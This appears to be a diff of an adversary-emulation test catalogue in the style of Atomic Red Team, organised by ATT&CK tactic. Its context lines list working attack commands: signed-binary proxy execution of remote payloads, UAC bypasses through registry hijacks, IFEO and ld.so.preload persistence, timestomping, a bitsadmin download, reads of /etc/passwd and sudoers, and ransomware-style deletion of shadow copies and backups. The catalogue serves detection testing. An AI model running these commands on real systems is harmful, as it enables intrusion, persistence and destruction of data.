@@ -12220,12 +12220,12 @@ defense-evasion:
name: command_prompt
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
'
'
- name: Register-CimProvider - Execute evil dll
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
note this dll can be served up via SMB
'
'
supported_platforms:
- windows
input_arguments:
@@ -12244,11 +12244,11 @@ defense-evasion:
name: command_prompt
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
'
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12265,12 +12265,12 @@ defense-evasion:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
in application installation, commonly seen in malware execution.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12282,12 +12282,12 @@ defense-evasion:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
installation.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12306,11 +12306,11 @@ defense-evasion:
name: command_prompt
command: 'msiexec.exe /y "#{dll_payload}"
'
'
- name: Odbcconf.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12329,7 +12329,7 @@ defense-evasion:
name: command_prompt
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
'
'
- name: InfDefaultInstall.exe .inf Execution
description: |
Test execution of a .inf using InfDefaultInstall.exe
@@ -12354,7 +12354,7 @@ defense-evasion:
elevation_required: false
command: 'InfDefaultInstall.exe #{inf_to_execute}
'
'
T1216:
technique:
x_mitre_data_sources:
@@ -12411,7 +12411,7 @@ defense-evasion:
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12425,12 +12425,12 @@ defense-evasion:
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
'
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12443,12 +12443,12 @@ defense-evasion:
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
'
- name: manage-bde.wsf Signed Script Command Execution
description: 'Executes the signed manage-bde.wsf script with options to execute
an arbitrary command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -12464,7 +12464,7 @@ defense-evasion:
cscript manage-bde.wsf
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
'
'
T1151:
technique:
x_mitre_data_sources:
@@ -12525,7 +12525,7 @@ defense-evasion:
- name: Space After Filename
description: 'Space After Filename
'
'
supported_platforms:
- macos
executor:
@@ -12587,7 +12587,7 @@ defense-evasion:
- name: Set a file's access timestamp
description: 'Stomps on the access timestamp of a file
'
'
supported_platforms:
- linux
- macos
@@ -12600,11 +12600,11 @@ defense-evasion:
name: sh
command: 'touch -a -t 197001010000.00 #{target_filename}
'
'
- name: Set a file's modification timestamp
description: 'Stomps on the modification timestamp of a file
'
'
supported_platforms:
- linux
- macos
@@ -12617,7 +12617,7 @@ defense-evasion:
name: sh
command: 'touch -m -t 197001010000.00 #{target_filename}
'
'
- name: Set a file's creation timestamp
description: |
Stomps on the create timestamp of a file
@@ -12661,7 +12661,7 @@ defense-evasion:
name: sh
command: 'touch -acmr #{reference_file_path} {target_file_path}
'
'
- name: Windows - Modify file creation timestamp with PowerShell
description: |
Modifies the file creation timestamp of a specified file.
@@ -12684,7 +12684,7 @@ defense-evasion:
command: 'powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime
= #{target_date_time} }
'
'
- name: Windows - Modify file last modified timestamp with PowerShell
description: |
Modifies the file last modified timestamp of a specified file.
@@ -12707,7 +12707,7 @@ defense-evasion:
command: 'powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime
= #{target_date_time} }
'
'
- name: Windows - Modify file last access timestamp with PowerShell
description: |
Modifies the last access timestamp of a specified file.
@@ -12730,7 +12730,7 @@ defense-evasion:
command: 'powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime
= #{target_date_time} }
'
'
T1127:
technique:
x_mitre_data_sources:
@@ -12863,7 +12863,7 @@ defense-evasion:
- name: MSBuild Bypass Using Inline Tasks
description: 'Executes the code in a project file using. C# Example
'
'
supported_platforms:
- windows
input_arguments:
@@ -12883,7 +12883,7 @@ defense-evasion:
elevation_required: false
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
'
'
T1102:
technique:
x_mitre_permissions_required:
@@ -12950,7 +12950,7 @@ defense-evasion:
- name: Reach out to C2 Pointer URLs via command_prompt
description: 'Download data from a public website using command line
'
'
supported_platforms:
- windows
executor:
@@ -12959,14 +12959,14 @@ defense-evasion:
command: 'bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/
%TEMP%\bitsadmindownload.html
'
'
cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
'
'
- name: Reach out to C2 Pointer URLs via powershell
description: 'Multiple download methods for files using powershell
'
'
supported_platforms:
- windows
executor:
@@ -13073,7 +13073,7 @@ defense-evasion:
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13101,13 +13101,13 @@ defense-evasion:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: MSXSL Bypass using remote files
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13123,12 +13123,12 @@ defense-evasion:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: WMIC bypass using local XSL file
description: 'Executes the code specified within a XSL script using a local
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13151,12 +13151,12 @@ defense-evasion:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
'
'
- name: WMIC bypass using remote XSL file
description: 'Executes the code specified within a XSL script using a remote
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13172,7 +13172,7 @@ defense-evasion:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
'
'
privilege-escalation:
T1134:
technique:
@@ -13403,7 +13403,7 @@ privilege-escalation:
description: 'Attaches cmd.exe to a list of processes. Configure your own Input
arguments to a different executable or list of executables.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13411,7 +13411,7 @@ privilege-escalation:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
'
'
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -13419,7 +13419,7 @@ privilege-escalation:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
'
'
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -13636,7 +13636,7 @@ privilege-escalation:
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
'
supported_platforms:
- windows
input_arguments:
@@ -13649,7 +13649,7 @@ privilege-escalation:
elevation_required: true
command: 'reg.exe import #{registry_file}
'
'
T1138:
technique:
x_mitre_data_sources:
@@ -13756,7 +13756,7 @@ privilege-escalation:
- name: New shim database files created in the default shim database directory
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -13771,7 +13771,7 @@ privilege-escalation:
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -13884,7 +13884,7 @@ privilege-escalation:
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -13899,12 +13899,12 @@ privilege-escalation:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
'
'
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -13921,12 +13921,12 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
'
'
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13943,12 +13943,12 @@ privilege-escalation:
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
'
'
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -13967,12 +13967,12 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC using ComputerDefaults - PowerShell
description: 'PowerShell code to bypass User Account Control using ComputerDefaults.exe
on Windows 10
'
'
supported_platforms:
- windows
input_arguments:
@@ -13991,13 +13991,13 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC by Mocking Trusted Directories
description: 'Creates a fake "trusted directory" and copies a binary to bypass
UAC. The UAC bypass may not work on fully patched systems, however the directory
structure will be created.
'
'
supported_platforms:
- windows
input_arguments:
@@ -14186,7 +14186,7 @@ privilege-escalation:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
'
supported_platforms:
- macos
input_arguments:
@@ -14418,7 +14418,7 @@ privilege-escalation:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: 'Hooks functions in PowerShell to read TLS Communications
'
'
supported_platforms:
- windows
input_arguments:
@@ -14532,7 +14532,7 @@ privilege-escalation:
- name: IFEO Add Debugger
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -14550,15 +14550,15 @@ privilege-escalation:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
'
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /f
'
'
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -14650,7 +14650,7 @@ privilege-escalation:
- name: Launch Daemon
description: 'Utilize LaunchDaemon to launch `Hello World`
'
'
supported_platforms:
- macos
executor:
@@ -14748,7 +14748,7 @@ privilege-escalation:
- name: Service Installation
description: 'Installs A Local Service
'
'
supported_platforms:
- windows
input_arguments:
@@ -14779,7 +14779,7 @@ privilege-escalation:
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: 'Installs A Local Service via PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -14986,7 +14986,7 @@ privilege-escalation:
- name: Plist Modification
description: 'Modify MacOS plist file in one of two directories
'
'
supported_platforms:
- macos
executor:
@@ -15079,7 +15079,7 @@ privilege-escalation:
description: 'Appends a start process cmdlet to the current user''s powershell
profile pofile that points to a malicious executable
'
'
supported_platforms:
- windows
input_arguments:
@@ -15262,7 +15262,7 @@ privilege-escalation:
- name: Process Injection via mavinject.exe
description: 'Windows 10 Utility To Inject DLLS
'
'
supported_platforms:
- windows
input_arguments:
@@ -15290,7 +15290,7 @@ privilege-escalation:
- name: Process Injection via PowerSploit
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
'
supported_platforms:
- windows
input_arguments:
@@ -15325,13 +15325,13 @@ privilege-escalation:
elevation_required: true
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
'
'
- name: Shared Library Injection via LD_PRELOAD
description: 'This test injects a shared object library via the LD_PRELOAD environment
variable to execute. This technique was used by threat actor Rocke during
the exploitation of Linux web servers. This requires the `glibc` package.
'
'
supported_platforms:
- linux
input_arguments:
@@ -15344,7 +15344,7 @@ privilege-escalation:
elevation_required: false
command: 'LD_PRELOAD=#{path_to_shared_library} ls
'
'
- name: Process Injection via C#
description: |
Process Injection using C#
@@ -15482,7 +15482,7 @@ privilege-escalation:
elevation_required: false
command: 'at 13:20 /interactive cmd
'
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -15501,14 +15501,14 @@ privilege-escalation:
elevation_required: true
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
'
'
- name: Scheduled task Remote
description: 'Create a task on a remote system
'
'
supported_platforms:
- windows
input_arguments:
@@ -15538,10 +15538,10 @@ privilege-escalation:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
'
'
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
@@ -15561,7 +15561,7 @@ privilege-escalation:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
'
T1058:
technique:
x_mitre_data_sources:
@@ -15701,7 +15701,7 @@ privilege-escalation:
description: 'Make, change owner, and change file attributes on a C source code
file
'
'
supported_platforms:
- macos
- linux
@@ -15727,7 +15727,7 @@ privilege-escalation:
- name: Set a SetUID flag on file
description: 'This test sets the SetUID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -15745,11 +15745,11 @@ privilege-escalation:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
- name: Set a SetGID flag on file
description: 'This test sets the SetGID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -15767,7 +15767,7 @@ privilege-escalation:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
T1165:
technique:
x_mitre_permissions_required:
@@ -15839,10 +15839,10 @@ privilege-escalation:
elevation_required: true
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
'
'
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
'
'
T1169:
technique:
x_mitre_data_sources:
@@ -15892,7 +15892,7 @@ privilege-escalation:
- name: Sudo usage
description: 'Common Sudo enumeration methods.
'
'
supported_platforms:
- macos
- linux
@@ -15973,7 +15973,7 @@ privilege-escalation:
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
'
supported_platforms:
- macos
- linux
@@ -15986,7 +15986,7 @@ privilege-escalation:
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
'
supported_platforms:
- macos
- linux
@@ -16083,10 +16083,10 @@ privilege-escalation:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
'
cleanup_command: 'del #{web_shell_path} >nul 2>&1
'
'
impact:
T1531:
technique:
@@ -16148,7 +16148,7 @@ impact:
description: 'Changes the user password to hinder access attempts. Seen in use
by LockerGoga.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16173,14 +16173,14 @@ impact:
elevation_required: true
command: 'net.exe user #{user_account} #{new_password}
'
'
cleanup_command: 'net.exe user #{user_account} /delete
'
'
- name: Delete User - Windows
description: 'Deletes a user account to prevent access.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16275,7 +16275,7 @@ impact:
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
numerous ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16283,12 +16283,12 @@ impact:
elevation_required: true
command: 'vssadmin.exe delete shadows /all /quiet
'
'
- name: Windows - Delete Windows Backup Catalog
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16296,7 +16296,7 @@ impact:
elevation_required: true
command: 'wbadmin.exe delete catalog -quiet
'
'
- name: Windows - Disable Windows Recovery Console Repair
description: |
Disables repair by the Windows Recovery Console on boot.
@@ -16358,11 +16358,11 @@ impact:
name: bash
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
'
'
- name: Windows - Delete Backup Files
description: 'Deletes backup files in a manner similar to Ryuk ransomware.
'
'
supported_platforms:
- windows
executor:
@@ -16371,7 +16371,7 @@ impact:
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
'
'
'':
technique:
x_mitre_data_sources:
@@ -16495,7 +16495,7 @@ impact:
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
numerous ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16503,12 +16503,12 @@ impact:
elevation_required: true
command: 'vssadmin.exe delete shadows /all /quiet
'
'
- name: Windows - Delete Volume Shadow Copies via WMI
description: 'Deletes Windows Volume Shadow Copies via WMI. This technique is
used by numerous ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16516,12 +16516,12 @@ impact:
elevation_required: true
command: 'wmic.exe shadowcopy delete
'
'
- name: Windows - Delete Windows Backup Catalog
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
ransomware families and APT malware such as Olympic Destroyer.
'
'
supported_platforms:
- windows
executor:
@@ -16529,7 +16529,7 @@ impact:
elevation_required: true
command: 'wbadmin.exe delete catalog -quiet
'
'
- name: Windows - Disable Windows Recovery Console Repair
description: "Disables repair by the Windows Recovery Console on boot. \nThis
technique is used by numerous ransomware families and APT malware such as
@@ -16554,7 +16554,7 @@ impact:
command: 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object
{$_.Delete();}"
'
'
T1496:
technique:
x_mitre_data_sources:
@@ -16630,7 +16630,7 @@ impact:
name: bash
command: 'yes > /dev/null
'
'
T1489:
technique:
x_mitre_permissions_required:
@@ -16702,7 +16702,7 @@ impact:
- name: Windows - Stop service using Service Controller
description: 'Stops a specified service using the sc.exe command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16715,14 +16715,14 @@ impact:
elevation_required: true
command: 'sc.exe stop #{service_name}
'
'
cleanup_command: 'sc.exe start #{service_name}
'
'
- name: Windows - Stop service using net.exe
description: 'Stops a specified service using the net.exe command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16735,10 +16735,10 @@ impact:
elevation_required: true
command: 'net.exe stop #{service_name}
'
'
cleanup_command: 'net.exe start #{service_name}
'
'
- name: Windows - Stop service by killing process
description: "Stops a specified service killng the service's process. \nThis
technique was used by WannaCry.\n"
@@ -16754,7 +16754,7 @@ impact:
elevation_required: false
command: 'taskkill.exe /f /im #{process_name}
'
'
T1529:
technique:
x_mitre_data_sources:
@@ -16813,7 +16813,7 @@ impact:
- name: Shutdown System - Windows
description: 'This test shuts down a Windows system.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16826,11 +16826,11 @@ impact:
elevation_required: true
command: 'shutdown /s /t #{timeout}
'
'
- name: Restart System - Windows
description: 'This test restarts a Windows system.
'
'
supported_platforms:
- windows
input_arguments:
@@ -16843,11 +16843,11 @@ impact:
elevation_required: true
command: 'shutdown /r /t #{timeout}
'
'
- name: Restart System via `shutdown` - macOS/Linux
description: 'This test restarts a macOS/Linux system.
'
'
supported_platforms:
- macos
- linux
@@ -16861,11 +16861,11 @@ impact:
elevation_required: true
command: 'shutdown -r #{timeout}
'
'
- name: Shutdown System via `shutdown` - macOS/Linux
description: 'This test shuts down a macOS/Linux system using a halt.
'
'
supported_platforms:
- macos
- linux
@@ -16879,11 +16879,11 @@ impact:
elevation_required: true
command: 'shutdown -h #{timeout}
'
'
- name: Restart System via `reboot` - macOS/Linux
description: 'This test restarts a macOS/Linux system via `reboot`.
'
'
supported_platforms:
- macos
- linux
@@ -16892,11 +16892,11 @@ impact:
elevation_required: true
command: 'reboot
'
'
- name: Shutdown System via `halt` - Linux
description: 'This test shuts down a Linux system using `halt`.
'
'
supported_platforms:
- linux
executor:
@@ -16906,7 +16906,7 @@ impact:
- name: Reboot System via `halt` - Linux
description: 'This test restarts a Linux system using `halt`.
'
'
supported_platforms:
- linux
executor:
@@ -16916,7 +16916,7 @@ impact:
- name: Shutdown System via `poweroff` - Linux
description: 'This test shuts down a Linux system using `poweroff`.
'
'
supported_platforms:
- linux
executor:
@@ -16926,7 +16926,7 @@ impact:
- name: Reboot System via `poweroff` - Linux
description: 'This test restarts a Linux system using `poweroff`.
'
'
supported_platforms:
- linux
executor:
@@ -17028,7 +17028,7 @@ discovery:
- name: Enumerate all accounts
description: 'Enumerate all accounts by copying /etc/passwd to another file
'
'
supported_platforms:
- linux
- macos
@@ -17041,7 +17041,7 @@ discovery:
name: sh
command: 'cat /etc/passwd > #{output_file}
'
'
- name: View sudoers access
description: "(requires root)\n"
supported_platforms:
@@ -17056,11 +17056,11 @@ discovery:
name: sh
command: 'cat /etc/sudoers > #{output_file}
'
'
- name: View accounts with UID 0
description: 'View accounts wtih UID 0
'
'
supported_platforms:
- linux
- macos
@@ -17073,11 +17073,11 @@ discovery:
name: sh
command: 'grep ''x:0:'' /etc/passwd > #{output_file}
'
'
- name: List opened files by user
description: 'List opened files by user
'
'
supported_platforms:
- linux
- macos
@@ -17085,11 +17085,11 @@ discovery:
name: sh
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
'
'
- name: Show if a user account has ever logged in remotely
description: 'Show if a user account has ever logged in remotely
'
'
supported_platforms:
- linux
- macos
@@ -17102,11 +17102,11 @@ discovery:
name: sh
command: 'lastlog > #{output_file}
'
'
- name: Enumerate users and groups
description: 'Utilize groups and id to enumerate users and groups
'
'
supported_platforms:
- linux
- macos
@@ -17118,7 +17118,7 @@ discovery:
- name: Enumerate users and groups
description: 'Utilize local utilities to enumerate users and groups
'
'
supported_platforms:
- macos
executor:
@@ -17132,7 +17132,7 @@ discovery:
- name: Enumerate all accounts
description: 'Enumerate all accounts
'
'
supported_platforms:
- windows
executor:
@@ -17148,7 +17148,7 @@ discovery:
- name: Enumerate all accounts via PowerShell
description: 'Enumerate all accounts via PowerShell
'
'
supported_platforms:
- windows
executor:
@@ -17169,7 +17169,7 @@ discovery:
- name: Enumerate logged on users
description: 'Enumerate logged on users
'
'
supported_platforms:
- windows
executor:
@@ -17177,11 +17177,11 @@ discovery:
elevation_required: false
command: 'query user
'
'
- name: Enumerate logged on users via PowerShell
description: 'Enumerate logged on users via PowerShell
'
'
supported_platforms:
- windows
executor:
@@ -17189,7 +17189,7 @@ discovery:
elevation_required: false
command: 'query user
'
'
T1010:
technique:
x_mitre_data_sources:
@@ -17231,7 +17231,7 @@ discovery:
description: 'Compiles and executes C# code to list main window titles associated
with each process.
'
'
supported_platforms:
- windows
input_arguments:
@@ -17258,7 +17258,7 @@ discovery:
#{output_file_name}
cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
'
'
T1217:
technique:
x_mitre_data_sources:
@@ -17306,7 +17306,7 @@ discovery:
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
that contains bookmarks and lists any found instances to a text file.
'
'
supported_platforms:
- linux
executor:
@@ -17314,12 +17314,12 @@ discovery:
command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >>
/tmp/firefox-bookmarks.txt \;
'
'
- name: List Mozilla Firefox Bookmark Database Files on macOS
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
that contains bookmarks and lists any found instances to a text file.
'
'
supported_platforms:
- macos
executor:
@@ -17327,12 +17327,12 @@ discovery:
command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {}
>> /tmp/firefox-bookmarks.txt \;
'
'
- name: List Google Chrome Bookmark JSON Files on macOS
description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
bookmarks in JSON format and lists any found instances to a text file.
'
'
supported_platforms:
- macos
executor:
@@ -17340,31 +17340,31 @@ discovery:
command: 'find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt
\;
'
'
- name: List Google Chrome Bookmarks on Windows with powershell
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
that contains bookmarks.
'
'
supported_platforms:
- windows
executor:
name: powershell
command: 'where.exe /R C:\Users\ Bookmarks
'
'
- name: List Google Chrome Bookmarks on Windows with command prompt
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
that contains bookmarks.
'
'
supported_platforms:
- windows
executor:
name: command_prompt
command: 'where /R C:\Users\ Bookmarks
'
'
'':
technique:
x_mitre_data_sources:
@@ -17441,7 +17441,7 @@ discovery:
or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
especially in a short period of time, may aid in detection.
'
'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_contributors:
- Sunny Neo
@@ -17569,7 +17569,7 @@ discovery:
name: command_prompt
command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
'
'
- name: Windows - Discover domain trusts with nltest
description: |
Uses the nltest command to discover domain trusts.
@@ -17581,11 +17581,11 @@ discovery:
name: command_prompt
command: 'nltest /domain_trusts
'
'
- name: Powershell enumerate domains and forests
description: 'Use powershell to enumerate AD information
'
'
supported_platforms:
- windows
executor:
@@ -17652,7 +17652,7 @@ discovery:
- name: File and Directory Discovery
description: 'Find or discover files on the file system
'
'
supported_platforms:
- windows
executor:
@@ -17670,7 +17670,7 @@ discovery:
- name: File and Directory Discovery
description: 'Find or discover files on the file system
'
'
supported_platforms:
- windows
executor:
@@ -17705,7 +17705,7 @@ discovery:
- name: Nix File and Directory Discovery
description: 'Find or discover files on the file system
'
'
supported_platforms:
- macos
- linux
@@ -17773,7 +17773,7 @@ discovery:
- name: Port Scan
description: 'Scan ports to check for listening ports
'
'
supported_platforms:
- linux
- macos
@@ -17788,7 +17788,7 @@ discovery:
- name: Port Scan Nmap
description: 'Scan ports to check for listening ports with Nmap.
'
'
supported_platforms:
- linux
- macos
@@ -17892,7 +17892,7 @@ discovery:
- name: Network Share Discovery
description: 'Network Share Discovery
'
'
supported_platforms:
- macos
- linux
@@ -17910,7 +17910,7 @@ discovery:
- name: Network Share Discovery command prompt
description: 'Network Share Discovery utilizing the command prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -17923,11 +17923,11 @@ discovery:
elevation_required: false
command: 'net view \\#{computer_name}
'
'
- name: Network Share Discovery PowerShell
description: 'Network Share Discovery utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -17951,7 +17951,7 @@ discovery:
elevation_required: false
command: 'net share
'
'
T1040:
technique:
x_mitre_data_sources:
@@ -18010,7 +18010,7 @@ discovery:
description: 'Perform a PCAP. Wireshark will be required for tshark. TCPdump
may already be installed.
'
'
supported_platforms:
- linux
input_arguments:
@@ -18028,7 +18028,7 @@ discovery:
description: 'Perform a PCAP on MacOS. This will require Wireshark/tshark to
be installed. TCPdump may already be installed.
'
'
supported_platforms:
- macos
input_arguments:
@@ -18139,19 +18139,19 @@ discovery:
- name: Examine password complexity policy - Ubuntu
description: 'Lists the password complexity policy to console on Ubuntu Linux.
'
'
supported_platforms:
- linux
executor:
name: bash
command: 'cat /etc/pam.d/common-password
'
'
- name: Examine password complexity policy - CentOS/RHEL 7.x
description: 'Lists the password complexity policy to console on CentOS/RHEL
7.x Linux.
'
'
supported_platforms:
- linux
dependencies:
@@ -18163,12 +18163,12 @@ discovery:
name: bash
command: 'cat /etc/security/pwquality.conf
'
'
- name: Examine password complexity policy - CentOS/RHEL 6.x
description: 'Lists the password complexity policy to console on CentOS/RHEL
6.x Linux.
'
'
supported_platforms:
- linux
dependencies:
@@ -18184,18 +18184,18 @@ discovery:
- name: Examine password expiration policy - All Linux
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
'
'
supported_platforms:
- linux
executor:
name: bash
command: 'cat /etc/login.defs
'
'
- name: Examine local password policy - Windows
description: 'Lists the local password policy to console on Windows.
'
'
supported_platforms:
- windows
executor:
@@ -18203,11 +18203,11 @@ discovery:
elevation_required: false
command: 'net accounts
'
'
- name: Examine domain password policy - Windows
description: 'Lists the domain password policy to console on Windows.
'
'
supported_platforms:
- windows
executor:
@@ -18215,11 +18215,11 @@ discovery:
elevation_required: false
command: 'net accounts /domain
'
'
- name: Examine password policy - macOS
